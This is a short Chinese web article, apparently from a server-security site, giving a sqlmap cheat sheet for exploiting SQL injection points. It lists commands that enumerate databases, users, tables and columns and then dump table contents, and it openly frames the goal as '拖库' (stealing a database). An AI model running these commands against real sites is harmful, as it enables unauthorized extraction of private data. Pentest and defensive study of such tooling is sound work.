sqlmap实战教程 SQLMAP注入拖库常用命令 - 安全工具 - 服务器之家

服务器之家

专注于服务器技术!
当前位置:首页 > 服务器安全 > 安全工具

sqlmap实战教程 SQLMAP注入拖库常用命令

发布时间:2017-01-19 来源:服务器之家

SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。

#>  ./sqlmap.py -u “注入地址” -v 1 --dbs   // 列举数据库 

#> ./sqlmap.py -u “注入地址” -v 1 --current-db   // 当前数据库

#>./sqlmap.py -u “注入地址” -v 1 --users    // 列数据库用户

#>  ./sqlmap.py -u “注入地址” -v 1 --current-user  // 当前用户

#>  ./sqlmap.py -u “注入地址” -v 1 --tables -D “数据库”   // 列举数据库的表名

#> ./sqlmap.py -u “注入地址” -v 1 --columns -T “表名” -D “数据库”   // 获取表的列名

#>./sqlmap.py -u “注入地址” -v 1 --dump -C “字段,字段” -T “表名” -D “数据库”   // 获取表中的数据,包含列 

已经开始拖库了,SQLMAP是非常人性化的,它会将获取的数据存储sqlmap/output/中、、、